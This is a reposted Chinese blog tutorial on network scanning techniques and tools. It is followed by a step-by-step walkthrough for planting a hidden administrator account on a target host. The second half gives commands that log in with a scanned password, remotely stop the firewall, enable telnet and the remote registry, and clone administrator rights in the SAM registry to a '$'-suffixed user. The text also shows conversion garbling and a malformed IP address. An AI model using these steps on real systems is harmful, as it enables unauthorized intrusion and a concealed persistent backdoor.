天天看點

掃描技術和掃描工具

第2章-掃描技術

一、掃描技術概述

描描指的是利用工具軟體來探測目标網絡或主機的過程,其目的隻有一個:為即将采取的攻擊或防禦行動收集情報

(1)、掃描原理

1、ping檢測

Øping指令是最常用的網絡連接配接診斷工具,當然也可作為最基礎的掃描工具

Ø利生ICMP協定的響應機制,可以對目标IP位址、主機線上情況、作業系統類型等資訊作出初步判斷

【ping來判斷目标主機的作業系統情況】

a)TTL值趨近于128:windows XP/windows server 2000/windows server 2003

b)TTL值趨近于64 :windows 7/windows 2008

c)TTL值趨近于255:交換機、路由器等裝置

如下圖所示

<a target="_blank" href="http://blog.51cto.com/attachment/201307/124946212.jpg"></a>

2、端口掃描

Ø主要針對特定的網絡服務進行探測,嘗試連接配接目标主機的特定端口,根據回報結果來判斷是否開啟指定服務

Ø分類:TCP端口掃描、UDP端口掃描

【TCP端口掃描】

會向對方發送一個請求或終止通路的資料包,若對方給出正常回應,則表示目标服務開啟,否則表示端口關閉或可能被防火牆攔截

【UDP端口掃描】

通常會發送一個空資料包,若回報錯誤消息,則表示目标服務開啟,否則會告知端口不可達

【指令格式】

   telnet ip位址端口号如“telnet  192.168.4.17 21”

<a target="_blank" href="http://blog.51cto.com/attachment/201307/124957411.jpg"></a>

3、OS探測

Ø也就是作業系統(Operating System)探測,指的是擷取目标主機所使用的作業系統類型,版本等相關資訊的過程

Ø探測試式:随便通路一個不存在的網頁,通常能夠在出錯頁面上得到web服務程式的版本資訊

<a target="_blank" href="http://blog.51cto.com/attachment/201307/125004795.jpg"></a>

4、弱密碼探測

Ø弱密碼探測的方式類似于暴力破解,隻不過并不嘗試所有可能的密碼,而隻是嘗試安全性極差的密碼,如“abc123、123456”等

5、漏洞評估

Ø漏洞評估(或稱弱點評估),一般用在正面的系統安全加強工作中,主要針對伺服器系統各種已知的漏洞進行檢測,同時對各種公認的或潛在的見險進行摸拟,進而全面判斷目标主機的安全性

Ø漏洞評估通常由一系列獨立的掃描插件來執行,而并不是單一的掃描任務

(2)、常見的掃描工具

1、SuperScan

一款免費的TCP/UDP端口掃描工具,網址“www.foundstone.com”

2、Fluxay(流光)

由國内的“小榕軟體實驗室”開發的一款強大的內建掃描軟體,網址“www.netxeyes.com”

3、X-Scan

由國内的“安全焦點”出品的漏洞檢洞工具,網址“www.xfocus.net”

4、MBSA

   MBSA全稱“Microsoft BaselineSecurity Analyzer”微軟基準安全分析

器,由微軟公司開發的一款免費的作業系統安全評估工具,網址“www.microsoft.com”

5、Wikto

在Windows平台運作的Web弱點掃描工具,采用C#語言編寫,網址

“www.sensepost.com”

二、建立隐藏使用者的方法

本案例是用在被攻擊者主機上建立,也可在自己的主機上建立

1、用掃描工具擷取到對方的賬戶和密碼

2、用擷取到的賬戶和密碼先進入系統(假如對方IP為192.168.10.10,掃描到的密碼為123456)

   net use \\1962.168.10.10  /user:administrator 123456

3、遠端關閉對方的防火牆

   sc \\192.168.10.10  stop  sharedaccess

4、遠端開啟對方的遠端服務

   sc \\192.168.10.10  start  tlntsvr start= auto

   sc \\192.168.10.10  start  tlntsvr

5、遠端開啟對方的系統資料庫服務

   sc \\192.168.10.10  config  remoteregistry  start= auto

   sc \\192.168.10.10  start  remoteregistry

6、遠端登入系統

   telnet 192.168.10.10

7、建立隐藏使用者(假如取名為benet)

   net user  benet$  123456 /add

8、打開本地系統資料庫(regedit)

選擇“檔案”→→選擇"連接配接到網絡系統資料庫"→→輸入“對方IP:192.168.10.10”→→點選進入

9、賦予完全控制權限并編輯系統資料庫

   HKEY_LOCAL_MACHINE→SAM→SAM→Domain→Account

      users:權限(F)、功能(V)在這個選項裡

      Names:賬戶在這個選項裡

把管理者權限(ox1-F4)“0000001F4”複制給benet使用者(0x3eb)“0000003EB”

10、在導出benet使用者的“Names”和“Users”

說白了就是做個備份,導入位置随便哪都行

11、遠端删除benet使用者

   net user  benet$  /del

12、最後,在導入剛才導出的benet使用者

13、隐藏使用者建立成功

《注意》:如果是在本地建立的話,前面6步就可以省略,直接從第7步開始

本文轉自甘兵 51CTO部落格,原文連結:http://blog.51cto.com/ganbing/1258688,如需轉載請自行聯系原作者

繼續閱讀